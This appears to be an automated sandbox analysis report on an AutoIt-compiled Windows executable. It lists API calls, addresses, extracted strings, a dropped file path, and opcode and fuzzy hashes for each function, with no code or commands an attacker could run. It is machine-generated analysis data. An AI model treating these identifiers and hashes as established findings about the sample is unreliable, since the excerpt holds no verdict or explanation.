                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                                            • String ID: AU3!$EA06
                                                                            • API String ID: 1268643489-2658333250
                                                                            • Opcode ID: de76278e0dd356dcbdeaadef03a4817623e958728bad35c9d9936481bbeeb3ca
                                                                            • Instruction ID: 955ab2167f64b70cabe861cab0ac0cc0bf43fe29c4cfd681ca0065f004b6bb3a
                                                                            • Opcode Fuzzy Hash: de76278e0dd356dcbdeaadef03a4817623e958728bad35c9d9936481bbeeb3ca
                                                                            • Instruction Fuzzy Hash: 68410972E0414C9BCB11DB688891FFD3B64FB4A304F6844B9EA55CB243EE70A9458BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00831376
                                                                            • KillTimer.USER32(?,00000001), ref: 008313F9
                                                                              • Part of subcall function 00831240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0083129B
                                                                            • PostQuitMessage.USER32(00000000,?,00000001), ref: 0083140B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 3067442764-2362178303
                                                                            • Opcode ID: 0d4b25787a48725a8c152dc2f47c028a777d628e2240d59e14d415e4ca7b88fa
                                                                            • Instruction ID: d6c833a5ffe95f104404645ac21f0ef88ca3d79db3922f9cedbf0efbd15f883c
                                                                            • Opcode Fuzzy Hash: 0d4b25787a48725a8c152dc2f47c028a777d628e2240d59e14d415e4ca7b88fa
                                                                            • Instruction Fuzzy Hash: 1341E172608208DBDF24DB58ECCAFAA7369F790B21F004616F915C7791CAB8984087E7
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00863229: _wcsncpy.LIBCMT ref: 00863241
                                                                            • _wcslen.LIBCMT ref: 008635D7
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00863601
                                                                            • GetLastError.KERNEL32 ref: 00863610
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00863624
                                                                            • _wcsrchr.LIBCMT ref: 0086364B
                                                                              • Part of subcall function 008635B2: CreateDirectoryW.KERNEL32(?,00000000), ref: 0086368C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                            • String ID: \
                                                                            • API String ID: 321622961-2967466578
                                                                            • Opcode ID: ca4fbbc394b06143d0b6c2ca068dd7a91c769b0373c1818619582300a30f168e
                                                                            • Instruction ID: 6c766ac058c4ad0b4f36c45f213546d1822f5500741f2898d57d92940c7b5a6d
                                                                            • Opcode Fuzzy Hash: ca4fbbc394b06143d0b6c2ca068dd7a91c769b0373c1818619582300a30f168e
                                                                            • Instruction Fuzzy Hash: FC212B729013186ADF20AB78EC0ABEA336CFF12310F014795FD19D3141EB719B949AE2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove$_malloc
                                                                            • String ID:
                                                                            • API String ID: 1938898002-0
                                                                            • Opcode ID: a10198c5ad6de5bc9d3b88872ab7add69ea62b26a0da27a258af81c6084987bf
                                                                            • Instruction ID: 89d2e0afe4ed5aeac38e011a4adc3ea93f88c5fdb363daa8c30269b7e0f65531
                                                                            • Opcode Fuzzy Hash: a10198c5ad6de5bc9d3b88872ab7add69ea62b26a0da27a258af81c6084987bf
                                                                            • Instruction Fuzzy Hash: EE818172A142595BCB01FFA8DC42AEF7368FF84304F090665F914E7282DA35A91587E6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0083E72A
                                                                              • Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
                                                                              • Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3
                                                                            • GetCurrentProcess.KERNEL32(?), ref: 0083E7D4
                                                                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0083E832
                                                                            • FreeLibrary.KERNEL32(?), ref: 0083E842
                                                                            • FreeLibrary.KERNEL32(?), ref: 0083E854
                                                                            Similarity
                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3363477735-0
                                                                            • Opcode ID: 32225b7fe723371e2325aaefc174d86035bbeee8e0abbfed95029043622b5c56
                                                                            • Instruction ID: e7c9d7df0e7f1004782c09344ad74421cca228460ffebef8aa5948f9979b8ecf
                                                                            • Opcode Fuzzy Hash: 32225b7fe723371e2325aaefc174d86035bbeee8e0abbfed95029043622b5c56
                                                                            • Instruction Fuzzy Hash: C761A170D0868AEECB10DFA8D88429DBFB4FF49304F14466AD444D3B41C375A998CBDA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(0083F1FC), ref: 0083F3BD
                                                                            • SHGetDesktopFolder.SHELL32(?,008D90E8), ref: 0083F3D2
                                                                            • _wcsncpy.LIBCMT ref: 0083F3ED
                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 0083F427
                                                                            • _wcsncpy.LIBCMT ref: 0083F440
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                            • String ID: C:\Users\user\33920049\fmkkelc.omp
                                                                            • API String ID: 3170942423-3362734216
                                                                            • Opcode ID: 75a0c4743cc0ee80207272d949d8cdb4810a94dcaa5006660d6b16bdc60e8ad5
                                                                            • Instruction ID: 6a99bc99b8f65d3733d65d098acac26c87b4a9ee52b7cd1d0010d96bbfa127ec
                                                                            • Opcode Fuzzy Hash: 75a0c4743cc0ee80207272d949d8cdb4810a94dcaa5006660d6b16bdc60e8ad5
                                                                            • Instruction Fuzzy Hash: 45216276A00619ABCB14DBA4DC84DEFB37DEF88700F108698F909D7211E630AE45DBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00831E00: _wcsncpy.LIBCMT ref: 00831ED2
                                                                              • Part of subcall function 00831E00: _wcscpy.LIBCMT ref: 00831EF1
                                                                              • Part of subcall function 00831E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00831F03
                                                                            • KillTimer.USER32(?,?,?,?,?), ref: 00831513
                                                                            • SetTimer.USER32 ref: 00831522
                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00857BC8
                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00857C1C
                                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00857C67
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 3300667738-0
                                                                            • Opcode ID: dc43b5984c68850e0ff5dd9c07bbe610ea72ea33c5563b604149f7f1245da588
                                                                            • Instruction ID: 91969466d9b78974d48952be56896d176ad10c8279c3f2d4302059c98b3ced8e
                                                                            • Opcode Fuzzy Hash: dc43b5984c68850e0ff5dd9c07bbe610ea72ea33c5563b604149f7f1245da588
                                                                            • Instruction Fuzzy Hash: 50318170A08649BFEF26CB24DC99BE6FBBDFB86704F004195E58D96140C7705A848B92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0083E6A1), ref: 0083E6DD
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0083E6A1,00000000,?,?,?,0083E6A1), ref: 00857117
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0083E6A1,?,00000000,?,?,?,?,0083E6A1), ref: 0085715E
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0083E6A1), ref: 0085718F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: QueryValue$CloseOpen
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                                            • API String ID: 1586453840-614718249
                                                                            • Opcode ID: 77ceb0c24dd779598cd94d4bd7f4b2216efc1e5c3048e1fbbe31fdd7a97592ef
                                                                            • Instruction ID: 5bf05a54ebe8d3c7868444588206bba42023017692199a8128514f3fe7d5f667
                                                                            • Opcode Fuzzy Hash: 77ceb0c24dd779598cd94d4bd7f4b2216efc1e5c3048e1fbbe31fdd7a97592ef
                                                                            • Instruction Fuzzy Hash: 7121D572780604BBDB20DBA8DC46FEE77BCFF54701F104259B905E7290EA74AA058751
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32 ref: 00840385
                                                                            • CreateWindowExW.USER32 ref: 008403AE
                                                                            • ShowWindow.USER32(?,00000000), ref: 008403C4
                                                                            • ShowWindow.USER32(?,00000000), ref: 008403CE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1612042205-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,008D90E8,14000000,0085E1BD), ref: 00862FDD
                                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00862FEA
                                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00862FF5
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00862FFE
                                                                            • GetLastError.KERNEL32 ref: 00863009
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00863019
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                            • String ID:
                                                                            • API String ID: 1690418490-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 008406F7
                                                                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0084071E
                                                                            • RegCloseKey.KERNELBASE(?), ref: 00840745
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00840759
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 1607946009-824357125
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                                            • String ID: AU3!
                                                                            • API String ID: 1268643489-3499719025
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0083FE20: _wcslen.LIBCMT ref: 0083FE35
                                                                              • Part of subcall function 0083FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,008843ED,?,00000000,?,?), ref: 0083FE4E
                                                                              • Part of subcall function 0083FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0083FE77
                                                                            • _strcat.LIBCMT ref: 0083F4B6
                                                                              • Part of subcall function 0083F540: _strlen.LIBCMT ref: 0083F548
                                                                              • Part of subcall function 0083F540: _sprintf.LIBCMT ref: 0083F69E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                            • String ID: C:\Users\user\33920049\fmkkelc.omp$?T
                                                                            • API String ID: 3199840319-1843254402
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00846433), ref: 0084F4A7
                                                                            • __malloc_crt.LIBCMT ref: 0084F4D6
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0084F4E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                            • String ID:
                                                                            • API String ID: 237123855-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 00841511
                                                                              • Part of subcall function 008434DB: __FF_MSGBANNER.LIBCMT ref: 008434F4
                                                                              • Part of subcall function 008434DB: __NMSG_WRITE.LIBCMT ref: 008434FB
                                                                              • Part of subcall function 008434DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00846A35,?,00000001,?,?,00848179,00000018,008BD180,0000000C,00848209), ref: 00843520
                                                                            • std::exception::exception.LIBCMT ref: 00841546
                                                                            • std::exception::exception.LIBCMT ref: 00841560
                                                                            • __CxxThrowException@8.LIBCMT ref: 00841571
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID:
                                                                            • API String ID: 615853336-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • _memmove.LIBCMT ref: 00831D57
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
                                                                              • Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                            • String ID: @EXITCODE
                                                                            • API String ID: 2734553683-3436989551
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: __wcsicoll
                                                                            • String ID:
                                                                            • API String ID: 3832890014-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0085A95F
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0085A969
                                                                            • VariantClear.OLEAUT32(00000000), ref: 0085A97A
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopyInit_malloc
                                                                            • String ID:
                                                                            • API String ID: 2981388473-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • _memmove.LIBCMT ref: 00839FE6
                                                                            • VariantInit.OLEAUT32(00000000), ref: 00859B15
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00859B23
                                                                            • VariantClear.OLEAUT32(00000000), ref: 00859B34
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopyInit_malloc_memmove
                                                                            • String ID:
                                                                            • API String ID: 441919481-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1794320848-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID:
                                                                            • API String ID: 176396367-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 008A5381
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 008A5388
                                                                            Similarity
                                                                            • API ID: Process$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 2429186680-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 00862991
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00884515,00000000,00000000,?,?,?,00884515,?,000000FF), ref: 008629A6
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00884515,00000000,00000000,000000FF), ref: 008629E5
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_strlen
                                                                            • String ID:
                                                                            • API String ID: 1433632580-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 0083FE35
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,008843ED,?,00000000,?,?), ref: 0083FE4E
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0083FE77
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_wcslen
                                                                            • String ID:
                                                                            • API String ID: 2761822629-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Message$DispatchPeekTranslate
                                                                            • String ID:
                                                                            • API String ID: 4217535847-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0083F490: _strcat.LIBCMT ref: 0083F4B6
                                                                            • _free.LIBCMT ref: 00859524
                                                                              • Part of subcall function 008335F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00833681
                                                                              • Part of subcall function 008335F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00833697
                                                                              • Part of subcall function 008335F0: __wsplitpath.LIBCMT ref: 008336C2
                                                                              • Part of subcall function 008335F0: _wcscpy.LIBCMT ref: 008336D7
                                                                              • Part of subcall function 008335F0: _wcscat.LIBCMT ref: 008336EC
                                                                              • Part of subcall function 008335F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 008336FC
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                            • String ID: C:\Users\user\33920049\fmkkelc.omp
                                                                            • API String ID: 3938964917-3362734216
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 0085959F
                                                                              • Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C
                                                                              • Part of subcall function 0083F3B0: SHGetMalloc.SHELL32(0083F1FC), ref: 0083F3BD
                                                                              • Part of subcall function 0083F3B0: SHGetDesktopFolder.SHELL32(?,008D90E8), ref: 0083F3D2
                                                                              • Part of subcall function 0083F3B0: _wcsncpy.LIBCMT ref: 0083F3ED
                                                                              • Part of subcall function 0083F3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 0083F427
                                                                              • Part of subcall function 0083F3B0: _wcsncpy.LIBCMT ref: 0083F440
                                                                              • Part of subcall function 0083F290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0083F2AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                            • String ID: X
                                                                            • API String ID: 85490731-3081909835
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                            • String ID:
                                                                            • API String ID: 2388904642-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0083D979
                                                                            • FreeLibrary.KERNEL32(?), ref: 0083D98E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FreeInfoLibraryParametersSystem
                                                                            • String ID:
                                                                            • API String ID: 3403648963-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _malloc_wcscpy_wcslen
                                                                            • String ID:
                                                                            • API String ID: 245337311-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,?), ref: 0088E454
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0088E467
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite$FullNamePath
                                                                            • String ID:
                                                                            • API String ID: 3876400906-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0083E094,?,00000001,?,00833653,?), ref: 008407CA
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0083E094,?,00000001,?,00833653,?), ref: 00856296
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 008316E5
                                                                              • Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
                                                                              • Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3
                                                                            • _wcscat.LIBCMT ref: 00858BC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FullNamePath_memmove_wcscat_wcslen
                                                                            • String ID:
                                                                            • API String ID: 189345764-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00847E9A: __getptd_noexit.LIBCMT ref: 00847E9A
                                                                            • __lock_file.LIBCMT ref: 008449AD
                                                                              • Part of subcall function 00845391: __lock.LIBCMT ref: 008453B6
                                                                            • __fclose_nolock.LIBCMT ref: 008449B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 0083D5DC
                                                                              • Part of subcall function 00839430: PeekMessageW.USER32 ref: 008394B6
                                                                            • Sleep.KERNEL32(00000000), ref: 0085E125
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessagePeekSleepTimetime
                                                                            • String ID:
                                                                            • API String ID: 1792118007-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _malloc_wcscpy_wcslen
                                                                            • String ID:
                                                                            • API String ID: 245337311-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0083378C,?,?,?,00000010), ref: 00833D38
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00833D71
                                                                              • Part of subcall function 00833DA0: _memmove.LIBCMT ref: 00833DD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_malloc_memmove
                                                                            • String ID:
                                                                            • API String ID: 961785871-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • _memmove.LIBCMT ref: 0089FAAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _malloc_memmove
                                                                            • String ID:
                                                                            • API String ID: 1183979061-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
